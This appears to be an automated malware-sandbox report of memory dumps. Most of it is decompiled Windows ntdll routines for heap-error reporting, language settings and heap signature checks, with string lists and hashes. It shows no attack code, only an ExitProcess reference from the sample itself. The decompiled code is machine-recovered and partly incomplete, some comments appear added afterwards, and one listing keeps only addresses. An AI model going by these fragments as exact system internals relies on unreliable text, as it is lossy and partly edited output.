                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: e52c5476a837171dc8a978811fbc4c23597294151a432131ad7c373fcd3f6cb1
                                                                    • Instruction ID: 8d8b8b9df7de148bfabd18389c0285160d661019b1c164103e54c779b07a4feb
                                                                    • Opcode Fuzzy Hash: e52c5476a837171dc8a978811fbc4c23597294151a432131ad7c373fcd3f6cb1
                                                                    • Instruction Fuzzy Hash: 39B09B719464C5C9DA11E7A48608F17F90077D4755F16C171D2024645B4778C091F5B5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Strings
                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 017EB53F
                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 017EB48F
                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017EB3D6
                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 017EB476
                                                                    • The instruction at %p referenced memory at %p., xrefs: 017EB432
                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 017EB305
                                                                    • The resource is owned shared by %d threads, xrefs: 017EB37E
                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 017EB323
                                                                    • an invalid address, %p, xrefs: 017EB4CF
                                                                    • write to, xrefs: 017EB4A6
                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 017EB47D
                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 017EB2DC
                                                                    • *** enter .cxr %p for the context, xrefs: 017EB50D
                                                                    • This failed because of error %Ix., xrefs: 017EB446
                                                                    • *** Inpage error in %ws:%s, xrefs: 017EB418
                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 017EB352
                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 017EB484
                                                                    • a NULL pointer, xrefs: 017EB4E0
                                                                    • <unknown>, xrefs: 017EB27E, 017EB2D1, 017EB350, 017EB399, 017EB417, 017EB48E
                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 017EB39B
                                                                    • The critical section is owned by thread %p., xrefs: 017EB3B9
                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 017EB314
                                                                    • read from, xrefs: 017EB4AD, 017EB4B2
                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 017EB2F3
                                                                    • *** enter .exr %p for the exception record, xrefs: 017EB4F1
                                                                    • The resource is owned exclusively by thread %p, xrefs: 017EB374
                                                                    • Go determine why that thread has not released the critical section., xrefs: 017EB3C5
                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017EB38F
                                                                    • The instruction at %p tried to %s , xrefs: 017EB4B6
                                                                    • *** then kb to get the faulting stack, xrefs: 017EB51C
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                    • API String ID: 0-108210295
                                                                    • Opcode ID: ffbb633c31583176b958083514b74cd13b4826a55fd77658c977be8cf3e48d4d
                                                                    • Instruction ID: 2078786cc64fa6bc0757e2697b06f268a654d40d79fd040114afe7d949142c38
                                                                    • Opcode Fuzzy Hash: ffbb633c31583176b958083514b74cd13b4826a55fd77658c977be8cf3e48d4d
                                                                    • Instruction Fuzzy Hash: 4D8106B5A40220FFDB316A8ACC5ED7BFFA5EF5AB51F40408CF5046B116D2629492C7B2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 44%
                                                                    			E017F1C06() {
                                                                    				signed int _t27;
                                                                    				char* _t104;
                                                                    				char* _t105;
                                                                    				intOrPtr _t113;
                                                                    				intOrPtr _t115;
                                                                    				intOrPtr _t117;
                                                                    				intOrPtr _t119;
                                                                    				intOrPtr _t120;
                                                                    
                                                                    				_t105 = 0x17148a4;
                                                                    				_t104 = "HEAP: ";
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    					_push(_t104);
                                                                    					E0173B150();
                                                                    				} else {
                                                                    					E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    				}
                                                                    				_push( *0x182589c);
                                                                    				E0173B150("Heap error detected at %p (heap handle %p)\n",  *0x18258a0);
                                                                    				_t27 =  *0x1825898; // 0x0
                                                                    				if(_t27 <= 0xf) {
                                                                    					switch( *((intOrPtr*)(_t27 * 4 +  &M017F1E96))) {
                                                                    						case 0:
                                                                    							_t105 = "heap_failure_internal";
                                                                    							goto L21;
                                                                    						case 1:
                                                                    							goto L21;
                                                                    						case 2:
                                                                    							goto L21;
                                                                    						case 3:
                                                                    							goto L21;
                                                                    						case 4:
                                                                    							goto L21;
                                                                    						case 5:
                                                                    							goto L21;
                                                                    						case 6:
                                                                    							goto L21;
                                                                    						case 7:
                                                                    							goto L21;
                                                                    						case 8:
                                                                    							goto L21;
                                                                    						case 9:
                                                                    							goto L21;
                                                                    						case 0xa:
                                                                    							goto L21;
                                                                    						case 0xb:
                                                                    							goto L21;
                                                                    						case 0xc:
                                                                    							goto L21;
                                                                    						case 0xd:
                                                                    							goto L21;
                                                                    						case 0xe:
                                                                    							goto L21;
                                                                    						case 0xf:
                                                                    							goto L21;
                                                                    					}
                                                                    				}
                                                                    				L21:
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    					_push(_t104);
                                                                    					E0173B150();
                                                                    				} else {
                                                                    					E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    				}
                                                                    				_push(_t105);
                                                                    				E0173B150("Error code: %d - %s\n",  *0x1825898);
                                                                    				_t113 =  *0x18258a4; // 0x0
                                                                    				if(_t113 != 0) {
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0173B150();
                                                                    					} else {
                                                                    						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0173B150("Parameter1: %p\n",  *0x18258a4);
                                                                    				}
                                                                    				_t115 =  *0x18258a8; // 0x0
                                                                    				if(_t115 != 0) {
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0173B150();
                                                                    					} else {
                                                                    						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0173B150("Parameter2: %p\n",  *0x18258a8);
                                                                    				}
                                                                    				_t117 =  *0x18258ac; // 0x0
                                                                    				if(_t117 != 0) {
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0173B150();
                                                                    					} else {
                                                                    						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0173B150("Parameter3: %p\n",  *0x18258ac);
                                                                    				}
                                                                    				_t119 =  *0x18258b0; // 0x0
                                                                    				if(_t119 != 0) {
                                                                    					L41:
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0173B150();
                                                                    					} else {
                                                                    						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					_push( *0x18258b4);
                                                                    					E0173B150("Last known valid blocks: before - %p, after - %p\n",  *0x18258b0);
                                                                    				} else {
                                                                    					_t120 =  *0x18258b4; // 0x0
                                                                    					if(_t120 != 0) {
                                                                    						goto L41;
                                                                    					}
                                                                    				}
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    					_push(_t104);
                                                                    					E0173B150();
                                                                    				} else {
                                                                    					E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    				}
                                                                    				return E0173B150("Stack trace available at %p\n", 0x18258c0);
                                                                    			}

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                    • API String ID: 0-2897834094
                                                                    • Opcode ID: d44620f31007172ead41c45aaaf57e7be9c68bb6f01141b018e0e4cab8a43839
                                                                    • Instruction ID: 5757da4b58ecb61db55a2815a4b5d42cc65b3a056331bd264293c403ad5461a6
                                                                    • Opcode Fuzzy Hash: d44620f31007172ead41c45aaaf57e7be9c68bb6f01141b018e0e4cab8a43839
                                                                    • Instruction Fuzzy Hash: 6F61D473554155DFD221AB8DD498E36F3A4EB04A30F4980BFFB095B345DAB49982CF0A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 96%
                                                                    			E01743D34(signed int* __ecx) {
                                                                    				signed int* _v8;
                                                                    				char _v12;
                                                                    				signed int* _v16;
                                                                    				signed int* _v20;
                                                                    				char _v24;
                                                                    				signed int _v28;
                                                                    				signed int _v32;
                                                                    				char _v36;
                                                                    				signed int _v40;
                                                                    				signed int _v44;
                                                                    				signed int* _v48;
                                                                    				signed int* _v52;
	signed int _v56;
	signed int _v60;
	char _v68;
	signed int _t140;
	signed int _t161;
	signed int* _t236;
	signed int* _t242;
	signed int* _t243;
	signed int* _t244;
	signed int* _t245;
	signed int _t255;
	void* _t257;
	signed int _t260;
	void* _t262;
	signed int _t264;
	void* _t267;
	signed int _t275;
	signed int* _t276;
	short* _t277;
	signed int* _t278;
	signed int* _t279;
	signed int* _t280;
	short* _t281;
	signed int* _t282;
	short* _t283;
	signed int* _t284;
	void* _t285;

	_v60 = _v60 | 0xffffffff;
	_t280 = 0;
	_t242 = __ecx;
	_v52 = __ecx;
	_v8 = 0;
	_v20 = 0;
	_v40 = 0;
	_v28 = 0;
	_v32 = 0;
	_v44 = 0;
	_v56 = 0;
	_t275 = 0;
	_v16 = 0;
	if(__ecx == 0) {
		_t280 = 0xc000000d;
		_t140 = 0;
		L50:
		 *_t242 =  *_t242 | 0x00000800;
		_t242[0x13] = _t140;
		_t242[0x16] = _v40;
		_t242[0x18] = _v28;
		_t242[0x14] = _v32;
		_t242[0x17] = _t275;
		_t242[0x15] = _v44;
		_t242[0x11] = _v56;
		_t242[0x12] = _v60;
		return _t280;
	}
	if(E01741B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
		_v56 = 1;
		if(_v8 != 0) {
			L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
		}
		_v8 = _t280;
	}
	if(E01741B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
		_v60 =  *_v8;
		L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
		_v8 = _t280;
	}
	if(E01741B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
		L16:
		if(E01741B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
			L28:
			if(E01741B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
				L46:
				_t275 = _v16;
				L47:
				_t161 = 0;
				L48:
				if(_v8 != 0) {
					L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
				}
				_t140 = _v20;
				if(_t140 != 0) {
					if(_t275 != 0) {
						L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
						_t275 = 0;
						_v28 = 0;
						_t140 = _v20;
					}
				}
				goto L50;
			}
			_t167 = _v12;
			_t255 = _v12 + 4;
			_v44 = _t255;
			if(_t255 == 0) {
				_t276 = _t280;
				_v32 = _t280;
			} else {
				_t276 = L01754620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
				_t167 = _v12;
				_v32 = _t276;
			}
			if(_t276 == 0) {
				_v44 = _t280;
				_t280 = 0xc0000017;
				goto L46;
			} else {
				E0177F3E0(_t276, _v8, _t167);
				_v48 = _t276;
				_t277 = E01781370(_t276, 0x1714e90);
				_pop(_t257);
				if(_t277 == 0) {
					L38:
					_t170 = _v48;
					if( *_v48 != 0) {
						E0177BB40(0,  &_v68, _t170);
						if(L017443C0( &_v68,  &_v24) != 0) {
							_t280 =  &(_t280[0]);
						}
					}
					if(_t280 == 0) {
						_t280 = 0;
						L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
						_v44 = 0;
						_v32 = 0;
					} else {
						_t280 = 0;
					}
					_t174 = _v8;
					if(_v8 != 0) {
						L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
					}
					_v8 = _t280;
					goto L46;
				}
				_t243 = _v48;
				do {
					 *_t277 = 0;
					_t278 = _t277 + 2;
					E0177BB40(_t257,  &_v68, _t243);
					if(L017443C0( &_v68,  &_v24) != 0) {
						_t280 =  &(_t280[0]);
					}
					_t243 = _t278;
					_t277 = E01781370(_t278, 0x1714e90);
					_pop(_t257);
				} while (_t277 != 0);
				_v48 = _t243;
				_t242 = _v52;
				goto L38;
			}
		}
		_t191 = _v12;
		_t260 = _v12 + 4;
		_v28 = _t260;
		if(_t260 == 0) {
			_t275 = _t280;
			_v16 = _t280;
		} else {
			_t275 = L01754620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
			_t191 = _v12;
			_v16 = _t275;
		}
		if(_t275 == 0) {
			_v28 = _t280;
			_t280 = 0xc0000017;
			goto L47;
		} else {
			E0177F3E0(_t275, _v8, _t191);
			_t285 = _t285 + 0xc;
			_v48 = _t275;
			_t279 = _t280;
			_t281 = E01781370(_v16, 0x1714e90);
			_pop(_t262);
			if(_t281 != 0) {
				_t244 = _v48;
				do {
					 *_t281 = 0;
					_t282 = _t281 + 2;
					E0177BB40(_t262,  &_v68, _t244);
					if(L017443C0( &_v68,  &_v24) != 0) {
						_t279 =  &(_t279[0]);
					}
					_t244 = _t282;
					_t281 = E01781370(_t282, 0x1714e90);
					_pop(_t262);
				} while (_t281 != 0);
				_v48 = _t244;
				_t242 = _v52;
			}
			_t201 = _v48;
			_t280 = 0;
			if( *_v48 != 0) {
				E0177BB40(_t262,  &_v68, _t201);
				if(L017443C0( &_v68,  &_v24) != 0) {
					_t279 =  &(_t279[0]);
				}
			}
			if(_t279 == 0) {
				L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
				_v28 = _t280;
				_v16 = _t280;
			}
			_t202 = _v8;
			if(_v8 != 0) {
				L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
			}
			_v8 = _t280;
			goto L28;
		}
	}
	_t214 = _v12;
	_t264 = _v12 + 4;
	_v40 = _t264;
	if(_t264 == 0) {
		_v20 = _t280;
	} else {
		_t236 = L01754620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
		_t280 = _t236;
		_v20 = _t236;
		_t214 = _v12;
	}
	if(_t280 == 0) {
		_t161 = 0;
		_t280 = 0xc0000017;
		_v40 = 0;
		goto L48;
	} else {
		E0177F3E0(_t280, _v8, _t214);
		_t285 = _t285 + 0xc;
		_v48 = _t280;
		_t283 = E01781370(_t280, 0x1714e90);
		_pop(_t267);
		if(_t283 != 0) {
			_t245 = _v48;
			do {
				 *_t283 = 0;
				_t284 = _t283 + 2;
				E0177BB40(_t267,  &_v68, _t245);
				if(L017443C0( &_v68,  &_v24) != 0) {
					_t275 = _t275 + 1;
				}
				_t245 = _t284;
				_t283 = E01781370(_t284, 0x1714e90);
				_pop(_t267);
			} while (_t283 != 0);
			_v48 = _t245;
			_t242 = _v52;
		}
		_t224 = _v48;
		_t280 = 0;
		if( *_v48 != 0) {
			E0177BB40(_t267,  &_v68, _t224);
			if(L017443C0( &_v68,  &_v24) != 0) {
				_t275 = _t275 + 1;
			}
		}
		if(_t275 == 0) {
			L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
			_v40 = _t280;
			_v20 = _t280;
		}
		_t225 = _v8;
		if(_v8 != 0) {
			L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
		}
		_v8 = _t280;
		goto L16;
	}
}
                                                                    0x01743eed
                                                                    0x01743ef0
                                                                    0x01743ef3
                                                                    0x01743f02
                                                                    0x01743f05
                                                                    0x01743f08
                                                                    0x017982c0
                                                                    0x017982c3
                                                                    0x017982c5
                                                                    0x017982c8
                                                                    0x017982d0
                                                                    0x017982e4
                                                                    0x017982e6
                                                                    0x017982e6
                                                                    0x017982ed
                                                                    0x017982f4
                                                                    0x017982f7
                                                                    0x017982f8
                                                                    0x017982fc
                                                                    0x017982ff
                                                                    0x017982ff
                                                                    0x01743f0e
                                                                    0x01743f11
                                                                    0x01743f16
                                                                    0x01743f1d
                                                                    0x01743f31
                                                                    0x01798307
                                                                    0x01798307
                                                                    0x01743f31
                                                                    0x01743f39
                                                                    0x01743f48
                                                                    0x01743f4d
                                                                    0x01743f50
                                                                    0x01743f50
                                                                    0x01743f53
                                                                    0x01743f58
                                                                    0x01743f65
                                                                    0x01743f65
                                                                    0x01743f6a
                                                                    0x00000000
                                                                    0x01743f6a
                                                                    0x01743edd
                                                                    0x01743dda
                                                                    0x01743ddd
                                                                    0x01743de0
                                                                    0x01743de5
                                                                    0x01798245
                                                                    0x01743deb
                                                                    0x01743df7
                                                                    0x01743dfc
                                                                    0x01743dfe
                                                                    0x01743e01
                                                                    0x01743e01
                                                                    0x01743e06
                                                                    0x0179824d
                                                                    0x0179824f
                                                                    0x01798254
                                                                    0x00000000
                                                                    0x01743e0c
                                                                    0x01743e11
                                                                    0x01743e16
                                                                    0x01743e19
                                                                    0x01743e29
                                                                    0x01743e2c
                                                                    0x01743e2f
                                                                    0x0179825c
                                                                    0x0179825f
                                                                    0x01798261
                                                                    0x01798264
                                                                    0x0179826c
                                                                    0x01798280
                                                                    0x01798282
                                                                    0x01798282
                                                                    0x01798289
                                                                    0x01798290
                                                                    0x01798293
                                                                    0x01798294
                                                                    0x01798298
                                                                    0x0179829b
                                                                    0x0179829b
                                                                    0x01743e35
                                                                    0x01743e38
                                                                    0x01743e3d
                                                                    0x01743e44
                                                                    0x01743e58
                                                                    0x017982a3
                                                                    0x017982a3
                                                                    0x01743e58
                                                                    0x01743e60
                                                                    0x01743e6f
                                                                    0x01743e74
                                                                    0x01743e77
                                                                    0x01743e77
                                                                    0x01743e7a
                                                                    0x01743e7f
                                                                    0x01743e8c
                                                                    0x01743e8c
                                                                    0x01743e91
                                                                    0x00000000
                                                                    0x01743e91

                                                                    Strings
                                                                    • Kernel-MUI-Language-SKU, xrefs: 01743F70
                                                                    • WindowsExcludedProcs, xrefs: 01743D6F
                                                                    • Kernel-MUI-Language-Allowed, xrefs: 01743DC0
                                                                    • Kernel-MUI-Number-Allowed, xrefs: 01743D8C
                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 01743E97
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                    • API String ID: 0-258546922
                                                                    • Opcode ID: c9237cda180747c03c2569e7a721f07b48d36f333c8f1302087928c9ecc04a2d
                                                                    • Instruction ID: d1f31bb76dbe9834f44f0f0df657eadcf852884b31d85cb3cb7b7d78ab7f2805
                                                                    • Opcode Fuzzy Hash: c9237cda180747c03c2569e7a721f07b48d36f333c8f1302087928c9ecc04a2d
                                                                    • Instruction Fuzzy Hash: 27F15E72D00619EFCF11DF98D984AEEFBB9FF09650F1400AAE906A7214D7749E05CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 29%
                                                                    			E017340E1(void* __edx) {
                                                                    				void* _t19;   /* heap pointer, passed in ECX (argument not recovered by the decompiler) */
                                                                    				void* _t28;   /* added: used below but left undeclared in the decompiler output */
                                                                    				void* _t29;
                                                                    
                                                                    				_t28 = _t19;
                                                                    				_t29 = __edx;   /* name of the calling API, e.g. "RtlAllocateHeap", or NULL */
                                                                    				/* 0xeeffeeff is the NT heap signature; on this 32-bit build HEAP.Signature is at +0x60 */
                                                                    				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                                                    					/* fs:[0x30] is the PEB; PEB+0xc is Ldr. Before the loader list exists, print a bare prefix. */
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push("HEAP: ");
                                                                    						E0173B150();   /* E0173B150: printf-style debug output routine (decompiler-assigned name) */
                                                                    					} else {
                                                                    						/* Ldr+0xc is InLoadOrderModuleList; its first entry is the main image, whose
                                                                    						   BaseDllName (a UNICODE_STRING, hence %wZ) sits at +0x2c of the entry */
                                                                    						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0173B150("Invalid heap signature for heap at %p", _t28);
                                                                    					if(_t29 != 0) {
                                                                    						E0173B150(", passed to %s", _t29);
                                                                    					}
                                                                    					_push("\n");
                                                                    					E0173B150();
                                                                    					/* PEB+2 is BeingDebugged: break only when a debugger is attached */
                                                                    					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                    						 *0x1826378 = 1;   /* global flag raised around the breakpoint so the debugger can tell why it stopped */
                                                                    						asm("int3");
                                                                    						 *0x1826378 = 0;
                                                                    					}
                                                                    					return 0;   /* signature mismatch: not a valid heap */
                                                                    				}
                                                                    				return 1;   /* signature valid */
                                                                    			}





                                                                    Disassembly listing for E017340E1 (only the address column survived extraction; addresses 0x017340e6 to 0x0179049b, with 0x00000000 placeholder entries; instruction text not preserved)

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                    • API String ID: 0-188067316
                                                                    • Opcode ID: 1ded857ed9d0d3c3003a863db4f388c941dc894f0210aca9ac1590e99d7ea439
                                                                    • Instruction ID: abf66e9ac807fad8d6d4072524a54b4c26c87520e1d27e2c3dceddfe16d55c58
                                                                    • Opcode Fuzzy Hash: 1ded857ed9d0d3c3003a863db4f388c941dc894f0210aca9ac1590e99d7ea439
                                                                    • Instruction Fuzzy Hash: 12014C72111241AFD33A9B6DF45DF56F7A8DB81F30F28806FF00547656CAE49444C610
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • LdrpFindDllActivationContext, xrefs: 017A9331, 017A935D
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 017A933B, 017A9367
                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 017A932A
                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 017A9357
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 0-3779518884
                                                                    • Opcode ID: 5f8891bf47c438414a62b3ab9d55c0bb3b43b39dd266139ffba936daa1f453e7
                                                                    • Instruction ID: 569cd1dccdbae871dfc61c2d20a524ebe1d84ff77db44c6a2a7d0596e84b62d4
                                                                    • Opcode Fuzzy Hash: 5f8891bf47c438414a62b3ab9d55c0bb3b43b39dd266139ffba936daa1f453e7
                                                                    • Instruction Fuzzy Hash: 5E412872A403119FEF32AB1CCC8DA75F6BDAB49304F098269EE0457155E7709D80C783
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                    • API String ID: 2994545307-336120773
                                                                    • Opcode ID: 24af9a584fcf4465a31363251a244ed682f8db9a4074eec18387d0d5adc79be3
                                                                    • Instruction ID: 1ad4c9ac65d2864e93bee317f66e9ec9cc2509fac32fe1d81aa3343708e1e264
                                                                    • Opcode Fuzzy Hash: 24af9a584fcf4465a31363251a244ed682f8db9a4074eec18387d0d5adc79be3
                                                                    • Instruction Fuzzy Hash: 70311476200110EFD721DF6DC889F6BF7E8EF04624F14419EF6068B355E674AA48CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • LdrpDoPostSnapWork, xrefs: 01799C1E
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 01799C28
                                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01799C18
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
